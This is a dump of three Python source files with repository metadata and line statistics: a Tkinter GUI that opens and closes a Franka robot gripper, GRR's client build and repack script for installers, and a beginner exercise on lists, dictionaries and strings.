| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: fea4ed769af71f922b55fc3fe0ad5f2f54ffbfef | size: 762 | ext: py | lang: Python
max_stars_repo: scripts/libfranka_gui_gripper_run.py | nbfigueroa/franka_interactive_controllers | 7befdd5fbaa3c7a83b931292fab39ab98754a60c | ["MIT"] | stars: 6 | 2021-12-08T09:32:57.000Z | 2022-03-20T09:22:29.000Z
max_issues_repo: scripts/libfranka_gui_gripper_run.py | nbfigueroa/franka_interactive_controllers | 7befdd5fbaa3c7a83b931292fab39ab98754a60c | ["MIT"] | issues: null | null | null
max_forks_repo: scripts/libfranka_gui_gripper_run.py | nbfigueroa/franka_interactive_controllers | 7befdd5fbaa3c7a83b931292fab39ab98754a60c | ["MIT"] | forks: 3 | 2022-02-01T12:30:47.000Z | 2022-03-24T10:31:04.000Z
#!/usr/bin/env python3
import shlex
from tkinter import *
from tkinter import messagebox
from psutil import Popen
top = Tk()
top.title("Franka Gripper Control")
top.geometry("300x75")
def open():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 1'))
messagebox.showinfo("Open Gripper", "Gripper Opened")
node_process.terminate()
def close():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 0'))
messagebox.showinfo("Close Gripper", "Gripper Closed")
node_process.terminate()
B1 = Button(top, text = "Open Gripper", command = open)
B1.place(x = 30,y = 20)
B2 = Button(top, text = "Close Gripper", command = close)
B2.place(x = 160,y = 20)
top.mainloop()
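# ------------------------------------------------------------------
# A possible refactor (sketch, not part of the original script): the two
# callbacks above differ only in the flag passed to libfranka_gripper_run,
# so they can share one helper; this also avoids shadowing the builtin
# open(). It reuses only names already imported above.
def run_gripper(open_flag):
    """Launch libfranka_gripper_run with 1 (open) or 0 (close) and notify."""
    node_process = Popen(shlex.split(
        'rosrun franka_interactive_controllers libfranka_gripper_run %d' % open_flag))
    state = "Opened" if open_flag else "Closed"
    messagebox.showinfo("Franka Gripper", "Gripper " + state)
    node_process.terminate()
# B1 = Button(top, text="Open Gripper", command=lambda: run_gripper(1))
# B2 = Button(top, text="Close Gripper", command=lambda: run_gripper(0))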
| 25.4
| 99
| 0.745407
| 105
| 762
| 5.295238
| 0.457143
| 0.079137
| 0.061151
| 0.07554
| 0.284173
| 0.284173
| 0.284173
| 0.284173
| 0.284173
| 0.284173
| 0
| 0.031627
| 0.128609
| 762
| 29
| 100
| 26.275862
| 0.805723
| 0.027559
| 0
| 0.1
| 0
| 0
| 0.308108
| 0.137838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: fea64ce26f29e53484b8013f735f948fef203460 | size: 12,293 | ext: py | lang: Python
max_stars_repo: client/client_build.py | patriotemeritus/grr | bf2b9268c8b9033ab091e27584986690438bd7c3 | ["Apache-2.0"] | stars: 1 | 2015-06-24T09:07:20.000Z | 2015-06-24T09:07:20.000Z
max_issues_repo: client/client_build.py | patriotemeritus/grr | bf2b9268c8b9033ab091e27584986690438bd7c3 | ["Apache-2.0"] | issues: 3 | 2020-02-11T22:29:15.000Z | 2021-06-10T17:44:31.000Z
max_forks_repo: client/client_build.py | wandec/grr | 7fb7e6d492d1325a5fe1559d3aeae03a301c4baa | ["Apache-2.0"] | forks: null | null | null
#!/usr/bin/env python
"""This tool builds or repacks the client binaries.
This handles invocations for the build across the supported platforms including
handling Visual Studio, pyinstaller and other packaging mechanisms.
"""
import logging
import os
import platform
import time
# pylint: disable=unused-import
from grr.client import client_plugins
# pylint: enable=unused-import
from grr.lib import build
from grr.lib import builders
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import startup
parser = flags.PARSER
# Guess which arch we should be building based on where we are running.
if platform.architecture()[0] == "32bit":
default_arch = "i386"
else:
default_arch = "amd64"
default_platform = platform.system().lower()
parser.add_argument(
"--platform", choices=["darwin", "linux", "windows"],
default=default_platform,
help="The platform to build or repack for. This will default to "
"the current platform: %s." % platform.system())
parser.add_argument(
"--arch", choices=["amd64", "i386"],
default=default_arch,
help="The architecture to build or repack for.")
# Guess which package format we should be building based on where we are
# running.
if default_platform == "linux":
distro = platform.linux_distribution()[0]
if distro in ["Ubuntu", "debian"]:
default_package = "deb"
elif distro in ["CentOS Linux", "CentOS", "centos", "redhat", "fedora"]:
default_package = "rpm"
else:
default_package = None
elif default_platform == "darwin":
default_package = "dmg"
elif default_platform == "windows":
default_package = "exe"
parser.add_argument(
"--package_format", choices=["deb", "rpm"],
default=default_package,
help="The packaging format to use when building a Linux client.")
# Initialize sub parsers and their arguments.
subparsers = parser.add_subparsers(
title="subcommands", dest="subparser_name", description="valid subcommands")
# Build arguments.
parser_build = subparsers.add_parser(
"build", help="Build a client from source.")
parser_repack = subparsers.add_parser(
"repack", help="Repack a zip file into an installer (Only useful when "
"signing).")
parser_repack.add_argument("--template", default=None,
help="The template zip file to repack.")
parser_repack.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_repack.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_repack.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_repack.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy = subparsers.add_parser(
"deploy", help="Build a deployable self installer from a package.")
parser_deploy.add_argument("--template", default=None,
help="The template zip file to deploy.")
parser_deploy.add_argument("--templatedir", default="",
help="Directory containing template zip files to "
"repack. Incompatible with --template")
parser_deploy.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_deploy.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_deploy.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_buildanddeploy = subparsers.add_parser(
"buildanddeploy",
help="Build and deploy clients for multiple labels and architectures.")
parser_buildanddeploy.add_argument("--template", default=None,
help="The template zip file to repack, if "
"none is specified we will build it.")
args = parser.parse_args()
def GetBuilder(context):
"""Get the appropriate builder based on the selected flags."""
try:
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
builder_obj = builders.DarwinClientBuilder
elif args.platform == "windows":
context = ["Platform:Windows"] + context
builder_obj = builders.WindowsClientBuilder
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
builder_obj = builders.LinuxClientBuilder
elif args.package_format == "rpm":
context = ["Platform:Linux", "Target:LinuxRpm"] + context
builder_obj = builders.CentosClientBuilder
else:
parser.error("Couldn't guess packaging format for: %s" %
platform.linux_distribution()[0])
else:
parser.error("Unsupported build platform: %s" % args.platform)
except AttributeError:
raise RuntimeError("Unable to build for platform %s when running "
"on current platform." % args.platform)
return builder_obj(context=context)
def GetDeployer(context):
"""Get the appropriate client deployer based on the selected flags."""
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
deployer_obj = build.DarwinClientDeployer
elif args.platform == "windows":
context = ["Platform:Windows"] + context
deployer_obj = build.WindowsClientDeployer
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
deployer_obj = build.LinuxClientDeployer
else:
context = ["Platform:Linux", "Target:LinuxRpm"] + context
deployer_obj = build.CentosClientDeployer
else:
parser.error("Unsupported build platform: %s" % args.platform)
return deployer_obj(context=context)
def TemplateInputFilename(context):
"""Build template file name from config."""
if args.templatedir:
filename = config_lib.CONFIG.Get("PyInstaller.template_filename",
context=context)
return os.path.join(args.templatedir, filename)
return None
def BuildAndDeploy(context):
"""Run build and deploy to create installers."""
# ISO 8601 date
timestamp = time.strftime("%Y-%m-%dT%H:%M:%S%z")
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
# Output directory like: 2015-02-13T21:48:47-0800/linux_amd64_deb/
spec = "_".join((args.platform, args.arch, args.package_format))
output_dir = os.path.join(config_lib.CONFIG.Get(
"ClientBuilder.executables_path", context=context), timestamp, spec)
# If we weren't passed a template, build one
if args.template:
template_path = args.template
else:
template_path = os.path.join(output_dir, config_lib.CONFIG.Get(
"PyInstaller.template_filename", context=context))
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate(output_file=template_path)
# Get the list of contexts which we should be building.
context_list = config_lib.CONFIG.Get("ClientBuilder.BuildTargets")
logging.info("Building installers for: %s", context_list)
config_orig = config_lib.CONFIG.ExportState()
deployed_list = []
for deploycontext in context_list:
# Add the settings for this context
for newcontext in deploycontext.split(","):
config_lib.CONFIG.AddContext(newcontext)
context.append(newcontext)
try:
# If the ClientBuilder.target_platforms doesn't match our environment,
# skip.
if not config_lib.CONFIG.MatchBuildContext(args.platform, args.arch,
args.package_format):
continue
deployer = GetDeployer(context)
# Make a nicer filename out of the context string.
context_filename = deploycontext.replace(
"AllPlatforms Context,", "").replace(",", "_").replace(" ", "_")
deployed_list.append(context_filename)
output_filename = os.path.join(
output_dir, context_filename,
config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context))
logging.info("Deploying %s as %s with labels: %s", deploycontext,
config_lib.CONFIG.Get(
"Client.name", context=deployer.context),
config_lib.CONFIG.Get(
"Client.labels", context=deployer.context))
deployer.MakeDeployableBinary(template_path, output_filename)
finally:
# Remove the custom settings for the next deploy
for newcontext in deploycontext.split(","):
context.remove(newcontext)
config_lib.ImportConfigManger(config_orig)
logging.info("Complete, installers for %s are in %s", deployed_list,
output_dir)
def main(_):
"""Launch the appropriate builder."""
config_lib.CONFIG.AddContext(
"ClientBuilder Context",
"Context applied when we run the client builder script.")
startup.ClientInit()
# Make sure we have all the secondary configs since they may be set under the
# ClientBuilder Context
for secondconfig in config_lib.CONFIG["ConfigIncludes"]:
config_lib.CONFIG.LoadSecondaryConfig(secondconfig)
# Use basic console output logging so we can see what is happening.
logger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
logger.handlers = [handler]
# The following is used to change the identity of the builder based on the
# target platform.
context = flags.FLAGS.context
if args.arch == "amd64":
context.append("Arch:amd64")
else:
context.append("Arch:i386")
if args.subparser_name == "build":
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate()
elif args.subparser_name == "repack":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
output_filename = os.path.join(
args.outputdir, config_lib.CONFIG.Get(
"ClientBuilder.output_filename", context=deployer.context))
deployer.RepackInstaller(open(args.template, "rb").read(), args.output or
output_filename)
elif args.subparser_name == "deploy":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
template_path = (args.template or TemplateInputFilename(deployer.context) or
config_lib.CONFIG.Get("ClientBuilder.template_path",
context=deployer.context))
# If neither the output filename nor the output directory is specified,
# use the default location from the config file.
output = None
if args.output:
output = args.output
elif args.outputdir:
# If output filename isn't specified, write to args.outputdir with a
# .deployed extension so we can distinguish it from repacked binaries.
filename = ".".join(
(config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context), "deployed"))
output = os.path.join(args.outputdir, filename)
deployer.MakeDeployableBinary(template_path, output)
elif args.subparser_name == "buildanddeploy":
BuildAndDeploy(context)
if __name__ == "__main__":
flags.StartMain(main)
| 35.631884
| 80
| 0.663467
| 1,396
| 12,293
| 5.732092
| 0.217765
| 0.023619
| 0.035616
| 0.022494
| 0.366783
| 0.307048
| 0.291927
| 0.267933
| 0.242939
| 0.215196
| 0
| 0.004875
| 0.232409
| 12,293
| 344
| 81
| 35.735465
| 0.843154
| 0.130318
| 0
| 0.300429
| 0
| 0
| 0.237352
| 0.021441
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021459
| false
| 0
| 0.04721
| 0
| 0.085837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: fea677c9a939d2a74e86aae5f8b7734e53289cfd | size: 1,549 | ext: py | lang: Python
max_stars_repo: Greyatom-projects/code.py | naveena41/greyatom-python-for-data-science | 3aa63878ff12e0e8cdf0e63bafe9b4a2c082f7b1 | ["MIT"] | stars: null | null | null
max_issues_repo: Greyatom-projects/code.py | naveena41/greyatom-python-for-data-science | 3aa63878ff12e0e8cdf0e63bafe9b4a2c082f7b1 | ["MIT"] | issues: null | null | null
max_forks_repo: Greyatom-projects/code.py | naveena41/greyatom-python-for-data-science | 3aa63878ff12e0e8cdf0e63bafe9b4a2c082f7b1 | ["MIT"] | forks: null | null | null
# --------------
# Code starts here
# Create the lists
class_1 = ['geoffrey hinton', 'andrew ng', 'sebastian raschka', 'yoshu bengio']
class_2 = ['hilary mason', 'carla gentry', 'corinna cortes']
# Concatenate both the lists
new_class = class_1+class_2
print(new_class)
# Append the list
new_class.append('peter warden')
# Print updated list
print(new_class)
# Remove the element from the list
new_class.remove('carla gentry')
# Print the list
print(new_class)
# Create the Dictionary
courses = {"math": 65, "english": 70, "history": 80, "french": 70, "science":60}
# Add up the marks of all the subjects and store the sum in one variable `total`
total = 65 + 70 + 80 + 70 + 60
# Print the total
print(total)
# Apply the percentage formula
percentage = float(total) * (100 / 500)
# Print the percentage
print(percentage)
# Create the Dictionary
mathematics = {"geoffery hinton" :78, "andrew ng" :95, "sebastian raschka" :65, "yoshua benjio" :50, "hilary mason" :70, "corinna cortes" :66, "peter warden" :75}
topper = max(mathematics,key = mathematics.get)
print(topper)
# Split the given string (the topper's name) into a list of words
print(topper.split())
# Create variable first_name
first_name = 'andrew'
# Create variable Last_name and store the last element of the list
Last_name = 'ng'
# Concatenate the string
full_name = Last_name+' '+first_name
# print the full_name
print(full_name)
# print the name in upper case
certificate_name = full_name.upper()
print(certificate_name)
# Code ends here
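# ------------------------------------------------------------------
# A more idiomatic sketch of the same steps (assumption: it reuses the
# `courses`, `mathematics` and `topper` values defined above instead of
# hardcoding the marks or the name).
total = sum(courses.values())                      # 345, same as 65+70+80+70+60
percentage = total * 100 / (100 * len(courses))    # each subject is out of 100
topper = max(mathematics, key=mathematics.get)     # 'andrew ng'
first_name, Last_name = topper.split()             # ['andrew', 'ng']
certificate_name = (Last_name + ' ' + first_name).upper()
print(total, percentage, certificate_name)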
| 24.983871
| 163
| 0.701097
| 219
| 1,549
| 4.858447
| 0.415525
| 0.045113
| 0.036654
| 0.028195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034728
| 0.182053
| 1,549
| 61
| 164
| 25.393443
| 0.805051
| 0.369916
| 0
| 0.130435
| 0
| 0
| 0.276286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.391304
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|